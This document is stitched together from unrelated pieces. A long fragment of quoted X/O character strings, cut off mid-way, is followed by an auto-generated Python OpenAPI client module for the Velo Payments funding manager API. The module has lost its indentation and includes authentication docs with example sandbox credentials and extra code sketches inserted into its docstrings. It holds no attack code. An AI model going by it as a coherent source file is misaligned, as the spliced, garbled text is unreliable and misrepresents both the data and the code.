XXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
# coding: utf-8
# Source: velo_payments/api/funding_manager_api.py from velopaymentsapi/velo-python (Apache-2.0).
"""
Velo Payments APIs
## Terms and Definitions Throughout this document and the Velo platform the following terms are used: * **Payor.** An entity (typically a corporation) which wishes to pay funds to one or more payees via a payout. * **Payee.** The recipient of funds paid out by a payor. * **Payment.** A single transfer of funds from a payor to a payee. * **Payout.** A batch of Payments, typically used by a payor to logically group payments (e.g. by business day). Technically there need be no relationship between the payments in a payout - a single payout can contain payments to multiple payees and/or multiple payments to a single payee. * **Sandbox.** An integration environment provided by Velo Payments which offers a similar API experience to the production environment, but all funding and payment events are simulated, along with many other services such as OFAC sanctions list checking. ## Overview The Velo Payments API allows a payor to perform a number of operations. The following is a list of the main capabilities in a natural order of execution: * Authenticate with the Velo platform * Maintain a collection of payees * Query the payor’s current balance of funds within the platform and perform additional funding * Issue payments to payees * Query the platform for a history of those payments This document describes the main concepts and APIs required to get up and running with the Velo Payments platform. It is not an exhaustive API reference. For that, please see the separate Velo Payments API Reference. ## API Considerations The Velo Payments API is REST based and uses the JSON format for requests and responses. Most calls are secured using OAuth 2 security and require a valid authentication access token for successful operation. See the Authentication section for details. 
Where a dynamic value is required in the examples below, the {token} format is used, suggesting that the caller needs to supply the appropriate value of the token in question (without including the { or } characters). Where curl examples are given, the -d @filename.json approach is used, indicating that the request body should be placed into a file named filename.json in the current directory. Each of the curl examples in this document should be considered a single line on the command-line, regardless of how they appear in print. ## Authenticating with the Velo Platform Once Velo backoffice staff have added your organization as a payor within the Velo platform sandbox, they will create a payor Id, an API key and an API secret for you and share these with you in a secure manner. You will need to use these values to authenticate with the Velo platform in order to gain access to the APIs. The steps to take are explained in the following: (1) create a string comprising the API key (e.g. 44a9537d-d55d-4b47-8082-14061c2bcdd8) and API secret (e.g. c396b26b-137a-44fd-87f5-34631f8fd529) with a colon between them, e.g. 44a9537d-d55d-4b47-8082-14061c2bcdd8:c396b26b-137a-44fd-87f5-34631f8fd529 (2) base64 encode this string, e.g.: NDRhOTUzN2QtZDU1ZC00YjQ3LTgwODItMTQwNjFjMmJjZGQ4OmMzOTZiMjZiLTEzN2EtNDRmZC04N2Y1LTM0NjMxZjhmZDUyOQ== (3) create an HTTP **Authorization** header with the value set to e.g. Basic NDRhOTUzN2QtZDU1ZC00YjQ3LTgwODItMTQwNjFjMmJjZGQ4OmMzOTZiMjZiLTEzN2EtNDRmZC04N2Y1LTM0NjMxZjhmZDUyOQ== (4) perform the Velo authentication REST call using the HTTP header created above, e.g. 
via curl: ``` curl -X POST \\ -H \"Content-Type: application/json\" \\ -H \"Authorization: Basic NDRhOTUzN2QtZDU1ZC00YjQ3LTgwODItMTQwNjFjMmJjZGQ4OmMzOTZiMjZiLTEzN2EtNDRmZC04N2Y1LTM0NjMxZjhmZDUyOQ==\" \\ 'https://api.sandbox.velopayments.com/v1/authenticate?grant_type=client_credentials' ``` If successful, this call will result in a **200** HTTP status code and a response body such as: ``` { \"access_token\":\"19f6bafd-93fd-4747-b229-00507bbc991f\", \"token_type\":\"bearer\", \"expires_in\":1799, \"scope\":\"...\" } ``` ## API access following authentication Following successful authentication, the value of the access_token field in the response (indicated in green above) should then be presented with all subsequent API calls to allow the Velo platform to validate that the caller is authenticated. This is achieved by setting the HTTP Authorization header with the value set to e.g. Bearer 19f6bafd-93fd-4747-b229-00507bbc991f such as the curl example below: ``` -H \"Authorization: Bearer 19f6bafd-93fd-4747-b229-00507bbc991f \" ``` If you make other Velo API calls which require authorization but the Authorization header is missing or invalid then you will get a **401** HTTP status response. # noqa: E501
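As a sketch, the Authorization header above can also be built in Python using only the standard library (the key and secret below are the sandbox example values from this section, not live credentials):

```python
import base64

# Example sandbox credentials taken from the text above (not live credentials).
API_KEY = "44a9537d-d55d-4b47-8082-14061c2bcdd8"
API_SECRET = "c396b26b-137a-44fd-87f5-34631f8fd529"

def basic_auth_header(key, secret):
    # key:secret, base64-encoded, prefixed with "Basic " per HTTP Basic auth.
    token = base64.b64encode(f"{key}:{secret}".encode("ascii")).decode("ascii")
    return "Basic " + token

print(basic_auth_header(API_KEY, API_SECRET))
```

The resulting value is the Authorization header used in the curl call above.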
The version of the OpenAPI document: 2.26.124
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from velo_payments.api_client import ApiClient
from velo_payments.exceptions import (
ApiTypeError,
ApiValueError
)
class FundingManagerApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_ach_funding_request(self, source_account_id, funding_request_v1, **kwargs): # noqa: E501
"""Create Funding Request # noqa: E501
Instruct a funding request to transfer funds from the payor’s funding bank to the payor’s balance held within Velo. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_ach_funding_request(source_account_id, funding_request_v1, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_account_id: Source account id (required)
:param FundingRequestV1 funding_request_v1: Body to include the amount to be funded (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
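A minimal sketch of how the scalar-or-tuple _request_timeout forms described above can be normalized into explicit (connection, read) values; the helper name is illustrative only, and the real handling lives inside ApiClient and urllib3:

```python
# Illustrative helper, not part of this client: normalize a _request_timeout
# value into an explicit (connection, read) pair.
def normalize_timeout(timeout):
    if timeout is None:
        return (None, None)
    if isinstance(timeout, (int, float)):
        # A single number acts as the total request timeout for both phases.
        return (timeout, timeout)
    connection, read = timeout  # already a (connection, read) pair
    return (connection, read)

print(normalize_timeout(30))
print(normalize_timeout((3.05, 27)))
```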
"""
kwargs['_return_http_data_only'] = True
return self.create_ach_funding_request_with_http_info(source_account_id, funding_request_v1, **kwargs) # noqa: E501
